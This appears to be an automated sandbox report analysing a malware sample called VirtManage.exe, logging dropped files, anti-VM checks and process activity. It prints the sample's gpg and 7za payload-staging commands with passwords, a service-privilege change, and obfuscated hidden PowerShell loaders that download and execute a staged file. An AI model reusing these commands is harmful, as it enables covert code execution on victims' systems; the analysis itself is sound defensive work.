Source: C:\Windows\System32\whoami.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\whoami.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\whoami.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\whoami.exeProcess information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion

barindex
.NET source code contains a domain name check
Source: 23.2.powershell.exe.1e94d1aa5e8.0.raw.unpack, QXswUGRbaw.cs.Net Code: string.Format("{0} {1}\\{2}", Environment.GetEnvironmentVariable("COMPUTERNAME"), Environment.GetEnvironmentVariable("USERDOMAIN"), Environment.GetEnvironmentVariable("USERNAME"))
Source: 23.2.powershell.exe.1e9651d0000.1.raw.unpack, QXswUGRbaw.cs.Net Code: string.Format("{0} {1}\\{2}", Environment.GetEnvironmentVariable("COMPUTERNAME"), Environment.GetEnvironmentVariable("USERDOMAIN"), Environment.GetEnvironmentVariable("USERNAME"))
Source: 27.2.powershell.exe.234d5410000.1.raw.unpack, wxtjRIBKug.cs.Net Code: string.Format("{0} {1}\\{2}", Environment.GetEnvironmentVariable("COMPUTERNAME"), Environment.GetEnvironmentVariable("USERDOMAIN"), Environment.GetEnvironmentVariable("USERNAME"))
Source: 27.2.powershell.exe.234bd8a0dd8.0.raw.unpack, wxtjRIBKug.cs.Net Code: string.Format("{0} {1}\\{2}", Environment.GetEnvironmentVariable("COMPUTERNAME"), Environment.GetEnvironmentVariable("USERDOMAIN"), Environment.GetEnvironmentVariable("USERNAME"))
Source: 2s4bn4bw.dll.36.dr, QXswUGRbaw.cs.Net Code: string.Format("{0} {1}\\{2}", Environment.GetEnvironmentVariable("COMPUTERNAME"), Environment.GetEnvironmentVariable("USERDOMAIN"), Environment.GetEnvironmentVariable("USERNAME"))
Source: e3jseyke.dll.39.dr, wxtjRIBKug.cs.Net Code: string.Format("{0} {1}\\{2}", Environment.GetEnvironmentVariable("COMPUTERNAME"), Environment.GetEnvironmentVariable("USERDOMAIN"), Environment.GetEnvironmentVariable("USERNAME"))
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
Source: C:\Users\user\Desktop\VirtManage.exeWindow / User API: threadDelayed 8052Jump to behavior
Source: C:\Users\user\Desktop\VirtManage.exeWindow / User API: threadDelayed 1884Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 5442
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 4347
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 4983
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 4742
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\e3jseyke.dllJump to dropped file
Source: C:\Users\user\Desktop\VirtManage.exeDropped PE file which has not been started: C:\ProgramData\Microsoft\MicrosoftAPI\gpg-agent.exeJump to dropped file
Source: C:\Windows\SysWOW64\msiexec.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\MSI2C66.tmpJump to dropped file
Source: C:\Users\user\Desktop\VirtManage.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\nsrFD0A.tmp\nsExec.dllJump to dropped file
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\2s4bn4bw\2s4bn4bw.dllJump to dropped file
Source: C:\Windows\SysWOW64\msiexec.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\MSI2CE4.tmpJump to dropped file
Source: C:\ProgramData\Microsoft\MicrosoftAPI\7za.exeDropped PE file which has not been started: C:\ProgramData\Microsoft\MicrosoftAPI\aclui-2.dllJump to dropped file
Source: C:\Users\user\Desktop\VirtManage.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\nsrFD0A.tmp\nsis7z.dllJump to dropped file
Source: C:\ProgramData\Microsoft\MicrosoftAPI\gpg.exeDropped PE file which has not been started: C:\ProgramData\Microsoft\MicrosoftAPI\7za.dllJump to dropped file
Source: C:\ProgramData\Microsoft\MicrosoftAPI\gpg.exeAPI coverage: 0.2 %
Source: C:\ProgramData\Microsoft\MicrosoftAPI\gpg.exeAPI coverage: 0.2 %
Source: C:\Users\user\Desktop\VirtManage.exe TID: 6796Thread sleep time: -805200s >= -30000sJump to behavior
Source: C:\Users\user\Desktop\VirtManage.exe TID: 6796Thread sleep time: -188400s >= -30000sJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7068Thread sleep count: 5442 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7068Thread sleep count: 4347 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7120Thread sleep time: -4611686018427385s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5484Thread sleep count: 4983 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5484Thread sleep count: 4742 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1988Thread sleep time: -15679732462653109s >= -30000s
Source: C:\Windows\System32\svchost.exe TID: 6964Thread sleep time: -30000s >= -30000s
Source: C:\Windows\System32\svchost.exe TID: 1468Thread sleep time: -30000s >= -30000s
Source: C:\Windows\System32\svchost.exeFile opened: PhysicalDrive0
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Users\user\Desktop\VirtManage.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
Source: C:\Users\user\Desktop\VirtManage.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
Source: C:\Users\user\Desktop\VirtManage.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
Source: C:\Windows\SysWOW64\msiexec.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
Source: C:\Windows\SysWOW64\msiexec.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
Source: C:\Windows\SysWOW64\msiexec.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
Source: C:\Windows\SysWOW64\msiexec.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
Source: C:\Windows\SysWOW64\msiexec.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
Source: C:\Windows\SysWOW64\msiexec.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
Source: C:\Windows\SysWOW64\msiexec.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
Source: C:\Windows\SysWOW64\msiexec.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
Source: C:\Windows\SysWOW64\msiexec.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
Source: C:\Windows\SysWOW64\msiexec.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
Source: C:\Windows\SysWOW64\msiexec.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
Source: C:\Windows\SysWOW64\msiexec.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
Source: C:\Windows\SysWOW64\msiexec.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
Source: C:\Windows\SysWOW64\msiexec.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
Source: C:\Windows\SysWOW64\msiexec.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
Source: C:\Windows\SysWOW64\msiexec.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
Source: C:\Windows\SysWOW64\msiexec.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
Source: C:\Windows\SysWOW64\msiexec.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
Source: C:\Windows\SysWOW64\msiexec.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
Source: C:\Windows\SysWOW64\msiexec.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
Source: C:\Windows\SysWOW64\msiexec.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
Source: C:\Windows\System32\msiexec.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
Source: C:\Users\user\Desktop\VirtManage.exeCode function: 0_2_004068D4 FindFirstFileW,FindClose,0_2_004068D4
Source: C:\Users\user\Desktop\VirtManage.exeCode function: 0_2_00405C83 GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,0_2_00405C83
Source: C:\Users\user\Desktop\VirtManage.exeCode function: 0_2_00402930 FindFirstFileW,0_2_00402930
Source: C:\ProgramData\Microsoft\MicrosoftAPI\gpg.exeCode function: 1_2_004CC650 strpbrk,FindFirstFileW,gcry_free,strlen,gcry_malloc,gcry_free,FindNextFileW,FindClose,gcry_free,FindClose,gcry_free,FindClose,1_2_004CC650
Source: C:\ProgramData\Microsoft\MicrosoftAPI\gpg.exeCode function: 3_2_004CC650 strpbrk,FindFirstFileW,gcry_free,strlen,gcry_malloc,gcry_free,FindNextFileW,FindClose,gcry_free,FindClose,gcry_free,FindClose,3_2_004CC650
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
Source: powershell.exe, 00000017.00000002.3346373467.000001E94E0A6000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: tEventVmNetworkAdapter',
Source: powershell.exe, 00000017.00000002.3346373467.000001E94E0A6000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 'Remove-NetEventVmNetworkAdapter',
Source: powershell.exe, 0000001B.00000002.3345599262.00000234BD54A000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Remove-NetEventVmNetworkAdapter
Source: powershell.exe, 00000017.00000002.3346373467.000001E94E0A6000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 'MSFT_NetEventVmNetworkAdatper.cdxml',
Source: powershell.exe, 00000017.00000002.3346373467.000001E94E0A6000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Get-NetEventVmNetworkAdapterX
Source: powershell.exe, 0000001B.00000002.3345599262.00000234BD54A000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Add-NetEventVmNetworkAdapter
Source: powershell.exe, 00000017.00000002.3346373467.000001E94E0A6000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Remove-NetEventVmNetworkAdapterX
Source: powershell.exe, 00000017.00000002.3346373467.000001E94E0A6000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: +MSFT_NetEventVmNetworkAdatper.format.ps1xmlX
Source: powershell.exe, 00000017.00000002.3429436966.000001E9649E0000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll4D
Source: svchost.exe, 0000001D.00000002.2858401580.0000018B7E02B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWP}e
Source: 7za.exe, 00000007.00000003.965422387.000001FFA43E0000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: 968B3FD3385208B479FE43CC__F5E8C90CE968B3FD3385208B479FE43CVMware.Binding.WsTrust1.0.0.0{4B1FEDDD-E8BD-8A4B-41BF-2D55E4FD9D86}VMWARE~1.DLL|VMware.Binding.WsTrust.dll_FD9BA260F6E682E262FA42F3C05C6925C__FD9BA260F6E682E262FA42F3C05C6925log4net669E0DDF0BB1AA2A2.0.15.0{2FA634FE-D1FF-771A-58EB-507FF9A0FFBB}LOG4NET.DLL|log4net.dllSourceDir[ProgramFilesFolder][Manufacturer]\[ProductName]DIRCA_TARGETDIRTARGETDIR=""{6DD554EC-2D48-B234-25FF-6CF5942A837D}C__70867F2D6BE94247A3BF24C2A1A54D81.:USER'S~1|User's Programs Menu
Source: powershell.exe, 00000017.00000002.3346373467.000001E94E0A6000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Add-NetEventVmNetworkAdapterX
Source: powershell.exe, 0000001B.00000002.3417917924.00000234D5210000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001D.00000002.2858959230.0000018B7F654000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
Source: VirtManage.exe, 00000000.00000003.1061441141.0000000004890000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 0C5E500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000007500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: powershell.exe, 00000017.00000002.3346373467.000001E94E0A6000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: #MSFT_NetEventVmNetworkAdatper.cdxmlX
Source: powershell.exe, 00000017.00000002.3346373467.000001E94E0A6000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 'Add-NetEventVmNetworkAdapter',
Source: powershell.exe, 00000017.00000002.3346373467.000001E94E0A6000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 'Get-NetEventVmNetworkAdapter',
Source: powershell.exe, 0000001B.00000002.3345599262.00000234BD54A000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Get-NetEventVmNetworkAdapter
Source: powershell.exe, 00000017.00000002.3346373467.000001E94E0A6000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 'MSFT_NetEventVmNetworkAdatper.format.ps1xml',
Source: gpg.exe, 00000001.00000002.915312776.0000000000898000.00000004.00000020.00020000.00000000.sdmp, gpg.exe, 00000003.00000002.920106814.0000000000947000.00000004.00000020.00020000.00000000.sdmp, gpg.exe, 00000005.00000002.930967037.0000000000818000.00000004.00000020.00020000.00000000.sdmp, gpg.exe, 0000000A.00000002.991917473.0000000000A58000.00000004.00000020.00020000.00000000.sdmp, gpg.exe, 0000000C.00000002.997460558.00000000007A8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: C:\Users\user\Desktop\VirtManage.exeAPI call chain: ExitProcess graph end nodegraph_0-3893
Source: C:\Users\user\Desktop\VirtManage.exeAPI call chain: ExitProcess graph end nodegraph_0-3742
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformation
Source: C:\ProgramData\Microsoft\MicrosoftAPI\gpg.exeCode function: 1_2_004014F0 GetModuleHandleA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,1_2_004014F0
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
Source: C:\Windows\System32\whoami.exeProcess token adjusted: Debug
Source: C:\ProgramData\Microsoft\MicrosoftAPI\gpg.exeCode function: 1_2_00401170 Sleep,SetUnhandledExceptionFilter,__p__acmdln,malloc,strlen,malloc,memcpy,__initenv,_amsg_exit,_initterm,_cexit,exit,1_2_00401170
Source: C:\ProgramData\Microsoft\MicrosoftAPI\gpg.exeCode function: 1_2_004011B3 SetUnhandledExceptionFilter,__p__acmdln,malloc,strlen,malloc,memcpy,__initenv,1_2_004011B3
Source: C:\ProgramData\Microsoft\MicrosoftAPI\gpg.exeCode function: 3_2_00401170 Sleep,SetUnhandledExceptionFilter,__p__acmdln,malloc,strlen,malloc,memcpy,__initenv,_amsg_exit,_initterm,_cexit,exit,3_2_00401170
Source: C:\ProgramData\Microsoft\MicrosoftAPI\gpg.exeCode function: 3_2_004011B3 SetUnhandledExceptionFilter,__p__acmdln,malloc,strlen,malloc,memcpy,__initenv,3_2_004011B3
Source: C:\Users\user\Desktop\VirtManage.exeProcess created: C:\ProgramData\Microsoft\MicrosoftAPI\gpg.exe C:\ProgramData\Microsoft\MicrosoftAPI\gpg.exe --passphrase "12345678" --batch --yes --output C:\ProgramData\Microsoft\MicrosoftAPI\tools.7z --decrypt C:\ProgramData\Microsoft\MicrosoftAPI\5FILE.1A.gpgJump to behavior
Source: C:\Users\user\Desktop\VirtManage.exeProcess created: C:\ProgramData\Microsoft\MicrosoftAPI\gpg.exe C:\ProgramData\Microsoft\MicrosoftAPI\gpg.exe --passphrase "12345678" --batch --yes --output C:\ProgramData\Microsoft\MicrosoftAPI\7za.dll --decrypt C:\ProgramData\Microsoft\MicrosoftAPI\1FILE.1A.gpgJump to behavior
Source: C:\Users\user\Desktop\VirtManage.exeProcess created: C:\ProgramData\Microsoft\MicrosoftAPI\gpg.exe C:\ProgramData\Microsoft\MicrosoftAPI\gpg.exe --passphrase "12345678" --batch --yes --output C:\ProgramData\Microsoft\MicrosoftAPI\7za.exe --decrypt C:\ProgramData\Microsoft\MicrosoftAPI\2FILE.1A.gpgJump to behavior
Source: C:\Users\user\Desktop\VirtManage.exeProcess created: C:\ProgramData\Microsoft\MicrosoftAPI\7za.exe C:\ProgramData\Microsoft\MicrosoftAPI\7za x C:\ProgramData\Microsoft\MicrosoftAPI\tools.7z -pJerx#sdqWE45 -oC:\ProgramData\Microsoft\MicrosoftAPIJump to behavior
Source: C:\Users\user\Desktop\VirtManage.exeProcess created: C:\ProgramData\Microsoft\MicrosoftAPI\gpg.exe C:\ProgramData\Microsoft\MicrosoftAPI\gpg.exe --passphrase "12345678" --batch --yes --output C:\ProgramData\Microsoft\MicrosoftAPI\Cert.txt --decrypt C:\ProgramData\Microsoft\MicrosoftAPI\3FILE.1A.gpgJump to behavior
Source: C:\Users\user\Desktop\VirtManage.exeProcess created: C:\ProgramData\Microsoft\MicrosoftAPI\gpg.exe C:\ProgramData\Microsoft\MicrosoftAPI\gpg.exe --passphrase "12345678" --batch --yes --output C:\ProgramData\Microsoft\MicrosoftAPI\UpdateFull.7z --decrypt C:\ProgramData\Microsoft\MicrosoftAPI\4FILE.1A.gpgJump to behavior
Source: C:\Users\user\Desktop\VirtManage.exeProcess created: C:\ProgramData\Microsoft\MicrosoftAPI\7za.exe C:\ProgramData\Microsoft\MicrosoftAPI\7za x C:\ProgramData\Microsoft\MicrosoftAPI\UpdateFull.7z -pTG98HJerxsdqWE45 -oC:\ProgramData\Microsoft\MicrosoftAPIJump to behavior
Source: C:\Users\user\Desktop\VirtManage.exeProcess created: C:\ProgramData\Microsoft\MicrosoftAPI\gpg.exe C:\ProgramData\Microsoft\MicrosoftAPI\gpg.exe --passphrase "12345678" --batch --yes --output C:\ProgramData\Microsoft\MicrosoftAPI\7za.exe --decrypt C:\ProgramData\Microsoft\MicrosoftAPI\2FILE.1A.gpgJump to behavior
Source: C:\Users\user\Desktop\VirtManage.exeProcess created: C:\Windows\SysWOW64\sc.exe sc config msdtc obj= "LocalSystem"Jump to behavior
Source: C:\Users\user\Desktop\VirtManage.exeProcess created: C:\ProgramData\Microsoft\MicrosoftAPI\winapi.exe C:\ProgramData\Microsoft\MicrosoftAPI\winapi.exeJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\2s4bn4bw\2s4bn4bw.cmdline"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\whoami.exe "C:\Windows\system32\whoami.exe"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\e3jseyke.cmdline"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\whoami.exe "C:\Windows\system32\whoami.exe"
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user~1\AppData\Local\Temp\RES9D22.tmp" "c:\Users\user\AppData\Local\Temp\2s4bn4bw\CSC355371FC2ED34AC6B0D2C6DC18B9358D.TMP"
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user~1\AppData\Local\Temp\RES6B4F.tmp" "c:\Users\user\AppData\Local\Temp\CSCC2520B897D0D4F99AF1935CDE7767C35.TMP"
Source: C:\ProgramData\Microsoft\MicrosoftAPI\winapi.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -windowstyle hidden -command "sv 5pw $('c:\progr'+'amdata\micr'+'osoft\micro'+'softapi\ieq'+'u4aed'+'3u.t');set-item variable:\sh 'net.webclient';dir rid*;set-variable 7 (.(item variable:\*uti*t).value.(((item variable:\*uti*t).value|gm)[6].name).(((item variable:\*uti*t).value.(((item variable:\*uti*t).value|gm)[6].name)|gm|where-object{(variable _ -valueo).name-clike'*dl*t'}).name).invoke((item variable:\*uti*t).value.(((item variable:\*uti*t).value|gm)[6].name).(((item variable:\*uti*t).value.(((item variable:\*uti*t).value|gm)[6].name).psobject.methods|where-object{(variable _ -valueo).name-clike'*nd*e'}).name).invoke('n*ct',1,$true))(gv sh).value);set-variable gpw ((((variable 7).value|gm)|where-object{(variable _ -valueo).name-clike'd*g'}).name);.(get-command *e-*press*)((variable 7).value.((gci variable:/gpw).value).invoke((gv 5pw -valueo)))"
Source: C:\ProgramData\Microsoft\UpdateDesktop\winapi.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -windowstyle hidden -command "si variable:zx 'net.webclient';set-variable g8e $('c:\pro'+'gramdat'+'a\micro'+'soft\update'+'desktop\eep6d'+'i0ugu.t');dir rid*;set-variable kal (.$executioncontext.invokecommand.(($executioncontext.invokecommand.psobject.methods|where-object{(get-item variable:/_).value.name-ilike'g*d'}).name).invoke($executioncontext.invokecommand.getcommandname('n*-o*',1,1),[system.management.automation.commandtypes]::cmdlet)(gi variable:\zx).value);set-item variable:/75 ((((dir variable:\kal).value|member)|where-object{(get-item variable:/_).value.name-ilike'd*g'}).name);$executioncontext|foreach{(get-item variable:/_).value.invokecommand.(($executioncontext.invokecommand|member|where-object{(get-item variable:/_).value.name-ilike'*ke*pt'}).name).invoke((dir variable:\kal).value.((gv 75 -va)).invoke((childitem variable:/g8e).value))}"
Source: C:\ProgramData\Microsoft\MicrosoftAPI\winapi.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -windowstyle hidden -command "sv 5pw $('c:\progr'+'amdata\micr'+'osoft\micro'+'softapi\ieq'+'u4aed'+'3u.t');set-item variable:\sh 'net.webclient';dir rid*;set-variable 7 (.(item variable:\*uti*t).value.(((item variable:\*uti*t).value|gm)[6].name).(((item variable:\*uti*t).value.(((item variable:\*uti*t).value|gm)[6].name)|gm|where-object{(variable _ -valueo).name-clike'*dl*t'}).name).invoke((item variable:\*uti*t).value.(((item variable:\*uti*t).value|gm)[6].name).(((item variable:\*uti*t).value.(((item variable:\*uti*t).value|gm)[6].name).psobject.methods|where-object{(variable _ -valueo).name-clike'*nd*e'}).name).invoke('n*ct',1,$true))(gv sh).value);set-variable gpw ((((variable 7).value|gm)|where-object{(variable _ -valueo).name-clike'd*g'}).name);.(get-command *e-*press*)((variable 7).value.((gci variable:/gpw).value).invoke((gv 5pw -valueo)))"Jump to behavior
Source: C:\ProgramData\Microsoft\UpdateDesktop\winapi.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -windowstyle hidden -command "si variable:zx 'net.webclient';set-variable g8e $('c:\pro'+'gramdat'+'a\micro'+'soft\update'+'desktop\eep6d'+'i0ugu.t');dir rid*;set-variable kal (.$executioncontext.invokecommand.(($executioncontext.invokecommand.psobject.methods|where-object{(get-item variable:/_).value.name-ilike'g*d'}).name).invoke($executioncontext.invokecommand.getcommandname('n*-o*',1,1),[system.management.automation.commandtypes]::cmdlet)(gi variable:\zx).value);set-item variable:/75 ((((dir variable:\kal).value|member)|where-object{(get-item variable:/_).value.name-ilike'd*g'}).name);$executioncontext|foreach{(get-item variable:/_).value.invokecommand.(($executioncontext.invokecommand|member|where-object{(get-item variable:/_).value.name-ilike'*ke*pt'}).name).invoke((dir variable:\kal).value.((gv 75 -va)).invoke((childitem variable:/g8e).value))}"
Source: C:\Users\user\Desktop\VirtManage.exeCode function: 0_2_6C201096 GetModuleFileNameW,GlobalAlloc,CharPrevW,GlobalFree,GetTempFileNameW,CopyFileW,CreateFileW,CreateFileMappingW,MapViewOfFile,UnmapViewOfFile,CloseHandle,CloseHandle,lstrcatW,lstrlenW,GlobalAlloc,FindWindowExW,FindWindowExW,FindWindowExW,lstrcmpiW,lstrcmpiW,lstrcmpiW,DeleteFileW,GetVersion,GlobalAlloc,InitializeSecurityDescriptor,SetSecurityDescriptorDacl,CreatePipe,CreatePipe,CreatePipe,GetStartupInfoW,CreateProcessW,lstrcpyW,GetTickCount,WaitForSingleObject,GetExitCodeProcess,PeekNamedPipe,GetTickCount,ReadFile,IsTextUnicode,IsDBCSLeadByteEx,MultiByteToWideChar,lstrcpyW,GlobalReAlloc,lstrcpyW,GetTickCount,TerminateProcess,lstrcpyW,Sleep,lstrcpyW,wsprintfW,CloseHandle,CloseHandle,CloseHandle,CloseHandle,CloseHandle,CloseHandle,CloseHandle,DeleteFileW,GlobalFree,GlobalFree,GlobalFree,0_2_6C201096
Source: C:\Users\user\Desktop\VirtManage.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\VirtManage.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\VirtManage.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\VirtManage.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\VirtManage.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\VirtManage.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\VirtManage.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\VirtManage.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\msiexec.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\msiexec.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\System32\msiexec.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
